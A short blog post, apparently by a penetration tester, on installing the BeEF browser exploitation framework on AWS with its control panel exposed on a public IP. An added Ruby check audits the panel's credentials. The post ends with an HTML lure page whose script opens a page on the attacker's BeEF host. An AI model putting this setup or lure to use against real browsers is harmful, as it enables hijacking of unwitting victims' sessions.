BeEF Exploitation Framework installation on AWS

kali null
2 min read · Jun 24, 2018

I found running BeEF from Kali VirtualBox inconvenient because it requires port forwarding from VMnet, then LAN uggh… You’d really want to connect directly with BeEF. So there.

  1. Get an Ubuntu or other Debian-based instance. Red Hat (i.e. the Amazon instance) is missing some dependencies.
  2. Follow https://github.com/beefproject/beef/wiki/installation. Make sure to install Ruby; you can just run sudo apt-get install ruby-full
  3. Move to the beef directory and run ./install
  4. Add your instance's public IP to config.yaml under “Host Name / Domain Name”
  5. Don’t forget to add port 3000 to the security rules on the instance
  6. When you run BeEF locally the default login/pass is beef/beef, but because we set it to be accessible via a public IP, a more complex password will be autogenerated at startup
  7. Go to http://<IP>:3000/ui/panel to confirm that 🍖 is running
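
A pre-flight check for the config.yaml and login steps above, as an added example that is not part of the original post or of BeEF itself: it flags default or weak panel credentials before the instance is exposed on a public IP. The key names (beef.credentials.user/passwd, beef.http.host/port/public) are assumed from BeEF's stock config.yaml, the sample config is constructed, and audit_beef_config is a hypothetical helper.

```ruby
require "yaml"

# Constructed sample of the relevant part of BeEF's config.yaml.
# Key names are assumed from the stock file; "<IP>" is a placeholder.
SAMPLE_CONFIG = <<~CONFIG
  beef:
    credentials:
      user: "beef"
      passwd: "beef"
    http:
      host: "0.0.0.0"
      port: "3000"
      public: "<IP>"
CONFIG

COMMON_PASSWORDS = %w[beef password admin changeme].freeze

# Returns a list of findings; an empty list means the config passed.
def audit_beef_config(yaml_text)
  cfg   = YAML.safe_load(yaml_text)
  beef  = cfg.is_a?(Hash) ? (cfg["beef"] || {}) : {}
  creds = beef["credentials"] || {}
  http  = beef["http"] || {}
  user  = creds["user"].to_s
  pass  = creds["passwd"].to_s

  findings = []
  findings << "default login beef/beef still set" if user == "beef" && pass == "beef"
  if pass.empty?
    findings << "password is empty"
  else
    findings << "password shorter than 12 characters" if pass.length < 12
    findings << "password is a common value" if COMMON_PASSWORDS.include?(pass.downcase)
    findings << "password equals user name" if pass == user
  end

  # The panel is internet-facing when BeEF binds to all interfaces or a
  # public host name / IP is configured, as in the steps above.
  exposed = http["host"].to_s == "0.0.0.0" || !http["public"].to_s.empty?
  if exposed && findings.any?
    port = http["port"] || 3000
    findings << "panel on port #{port} is internet-facing with weak credentials"
  end
  findings
end

# Stand-alone run: print the findings for the constructed sample.
audit_beef_config(SAMPLE_CONFIG).each { |f| puts "FAIL: #{f}" } if __FILE__ == $PROGRAM_NAME
```

To audit a real install, pass the contents of its config.yaml (for example File.read on that path) instead of SAMPLE_CONFIG.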

Here is a basic example of how to open a malicious page once the link with the BeEF script has been clicked:

<!DOCTYPE html>
<html>
<head>
<title>browser exploit test</title>
<script type="text/javascript">
// Open the demo page served by the BeEF instance at <IP> in a new window
var win2 = window.open("http://<IP>:3000/demos/butcher/index.html");
</script>
</head>
<body>
</body>
</html>

Happy hacking!


kali null

security researcher and penetration tester. twitter: @kali_null